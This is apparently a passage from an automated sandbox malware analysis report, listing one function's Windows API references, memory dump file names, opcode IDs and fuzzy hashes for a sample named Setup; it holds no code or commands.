                                                                                              • Instruction Fuzzy Hash: 72D01238004200EFEB217F50C80CB01BAB4BF47B86FA0C81CF492988B2C3BA84A4CF00
                                                                                              Function 6C5DABD9 Relevance: 5.2, APIs: 4, Instructions: 199COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5DAC0D
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,00000000,?), ref: 6C5DAC9C
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168), ref: 6C5DACFB
                                                                                              • SetLastError.KERNEL32(00000000), ref: 6C5DAD1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterErrorLastLeavememset
                                                                                              • String ID:
                                                                                              • API String ID: 3008345650-0
                                                                                              • Opcode ID: f8295f219e60c9288a86d59c07c134dac88b2d966ea54d1e8d7658793fec878c
                                                                                              • Instruction ID: d56cb45d404693e75b3fdb2e3e8c5025e7720b8d5c7d0c232f8d20c71a572e79
                                                                                              • Opcode Fuzzy Hash: f8295f219e60c9288a86d59c07c134dac88b2d966ea54d1e8d7658793fec878c
                                                                                              • Instruction Fuzzy Hash: B4712631541349DBDB01DF18CC84F9B77B5EF84308F560495E9259AAA2C3B0ED88CF99